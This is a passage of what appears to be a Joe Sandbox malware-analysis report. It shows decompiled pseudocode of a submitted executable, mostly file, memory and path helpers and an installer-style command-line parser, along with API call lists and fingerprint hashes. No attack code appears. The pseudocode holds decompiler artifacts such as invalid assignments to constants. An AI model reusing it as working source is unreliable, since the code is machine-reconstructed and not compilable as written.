                                                                                                                                                                                                                                            				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                            				_t2 = _t18 + 1; // 0x8d8b40
                                                                                                                                                                                                                                            				if(_t2 < __edx) {
                                                                                                                                                                                                                                            					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                            					if(_t19 > __ecx) {
                                                                                                                                                                                                                                            						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                            						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                            							 *_t19 = 0x5c;
                                                                                                                                                                                                                                            							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t6 = _a4;
                                                                                                                                                                                                                                            					 *_t19 = 0;
                                                                                                                                                                                                                                            					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                            						_t6 = _t6 + 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return E008D16B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0x8007007a;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(008D8B3E,008D8B3F,00000001,008D8B3E,-00000003,?,008D60EC,008D1140,?), ref: 008D65BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: 4c1e3d7768bdc9f4839f06dd19e236eaa01445ccd5cb89ae70ba75ae71e3aba4
                                                                                                                                                                                                                                            • Instruction ID: 90369f60d1fcf4f2f559558c17189b2bd10089406c732f5dfb97926dc68c6f5b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c1e3d7768bdc9f4839f06dd19e236eaa01445ccd5cb89ae70ba75ae71e3aba4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABF0A2321042589BD731490DB884B76BFEDFB96310F28035FE8DAC3309EA558C9183A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E008D621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E008D597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008D623F
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                              • Part of subcall function 008D6285: GetLastError.KERNEL32(008D5BBC), ref: 008D6285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            • Opcode ID: 07a4c3d5631840f96d484bb3e5b9bce935f2d745205c48a2a49ac54fa1c37fc9
                                                                                                                                                                                                                                            • Instruction ID: 3ced9092d068ff8f2fd44ce6a88c24a17e2693af0bf0be2eae026def7e5a6d39
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07a4c3d5631840f96d484bb3e5b9bce935f2d745205c48a2a49ac54fa1c37fc9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23F0E2B070020CABEB50EB78DD02FBE37ACFB44700F40026BB986D6282FD749D948651
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D4B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0x8d8d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0x8d8d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0x8d8d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x8d8d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x8d8d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x8d8d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x8d8d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,008D4FA1,00000000), ref: 008D4B98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: ee52e6eac98d5c842d55c27fe3cad1b83da38add268f1407d025d803f9b15b48
                                                                                                                                                                                                                                            • Instruction ID: 430f25c305370db259cd06ae1f5989e70001b2eff960a22b0efc627138568f51
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee52e6eac98d5c842d55c27fe3cad1b83da38add268f1407d025d803f9b15b48
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF0FE31500B0CDF47619E7A8C02652BBE6FAA53707201B2BA46ED32D0DB70A841CB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D66AE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				unsigned int _t1;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                            					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,008D4777,?,008D4E38,?), ref: 008D66B1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D4CA0(long _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x008d4caa
                                                                                                                                                                                                                                            0x008d4cb1

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 008D4CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D4CC0(void* _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x008d4cc8
                                                                                                                                                                                                                                            0x008d4ccf

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E008D5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                            				signed int _t143;
                                                                                                                                                                                                                                            				CHAR* _t144;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                            				char _t155;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                                                                            				char _t170;
                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                            				intOrPtr* _t183;
                                                                                                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                                                                                                            				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x8d8004; // 0x12cb0cef
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E008D6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E008D6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x8d8004; // 0x12cb0cef
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E008D597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E008D44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x8d9124 = E008D6285();
									_t75 = 0;
								}
								return E008D6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E008D44B9(0, 0x521, 0x8d1140, 0, 0x40, 0);
												_t85 =  *0x8d8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
                                                                                                                                                                                                                                            											if(_t87 == 0) {
                                                                                                                                                                                                                                            												if(_v266 != 0) {
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t50;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t88 =  *_t183;
                                                                                                                                                                                                                                            															_t183 = _t183 + 1;
                                                                                                                                                                                                                                            														} while (_t88 != 0);
                                                                                                                                                                                                                                            														if(_t183 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t205 = 0x5b;
                                                                                                                                                                                                                                            															if(E008D667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                            																L115:
                                                                                                                                                                                                                                            																_t206 = 0x5d;
                                                                                                                                                                                                                                            																if(E008D667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                            																	L117:
                                                                                                                                                                                                                                            																	_t202 =  &_v276;
                                                                                                                                                                                                                                            																	_v276 = _t167;
                                                                                                                                                                                                                                            																	if(E008D5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t202 = 0x104;
                                                                                                                                                                                                                                            																		E008D1680(0x8d8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t202 = 0x5b;
                                                                                                                                                                                                                                            																	if(E008D667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		goto L117;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t202 = 0x5d;
                                                                                                                                                                                                                                            																if(E008D667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L115;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *0x8d8a24 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L50;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t100 = _t87 - 1;
                                                                                                                                                                                                                                            												if(_t100 == 0) {
                                                                                                                                                                                                                                            													L98:
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t38;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t101 =  *_t192;
                                                                                                                                                                                                                                            															_t192 = _t192 + 1;
                                                                                                                                                                                                                                            														} while (_t101 != 0);
                                                                                                                                                                                                                                            														if(_t192 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t202 =  &_v276;
                                                                                                                                                                                                                                            															_v276 = _t170;
                                                                                                                                                                                                                                            															if(E008D5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                            																_t218 = 0x8d8b3e;
                                                                                                                                                                                                                                            																_t105 = _v276;
                                                                                                                                                                                                                                            																if(_t104 != 0x54) {
                                                                                                                                                                                                                                            																	_t218 = 0x8d8a3a;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																E008D1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                            																_t202 = 0x104;
                                                                                                                                                                                                                                            																E008D658A(_t218, 0x104, 0x8d1140);
                                                                                                                                                                                                                                            																if(E008D31E0(_t218) != 0) {
                                                                                                                                                                                                                                            																	goto L50;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L106;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                            													if(_t111 == 0) {
                                                                                                                                                                                                                                            														if(_v266 != 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t199 = _v265;
                                                                                                                                                                                                                                            																if(_t199 != 0) {
                                                                                                                                                                                                                                            																	_t219 =  &_v265;
                                                                                                                                                                                                                                            																	do {
                                                                                                                                                                                                                                            																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                            																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                            																		if(_t115 == 0) {
                                                                                                                                                                                                                                            																			 *0x8d8a2c = 1;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			_t200 = 2;
                                                                                                                                                                                                                                            																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                            																			if(_t119 == 0) {
                                                                                                                                                                                                                                            																				 *0x8d8a30 = 1;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                            																					 *0x8d8a34 = 1;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t209 = 0;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																		_t118 =  *_t219;
                                                                                                                                                                                                                                            																		_t199 = _t118;
                                                                                                                                                                                                                                            																	} while (_t118 != 0);
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															 *0x8d8a2c = 1;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L50;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t127 = _t111 - 3;
                                                                                                                                                                                                                                            														if(_t127 == 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                            																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                            																		goto L76;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                            																			goto L83;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                            																				goto L76;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				goto L49;
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																L76:
                                                                                                                                                                                                                                            																_push(2);
                                                                                                                                                                                                                                            																_pop(1);
                                                                                                                                                                                                                                            																L83:
                                                                                                                                                                                                                                            																 *0x8d8a38 = 1;
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            															goto L50;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t132 = _t127 - 1;
                                                                                                                                                                                                                                            															if(_t132 == 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0) {
                                                                                                                                                                                                                                            																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
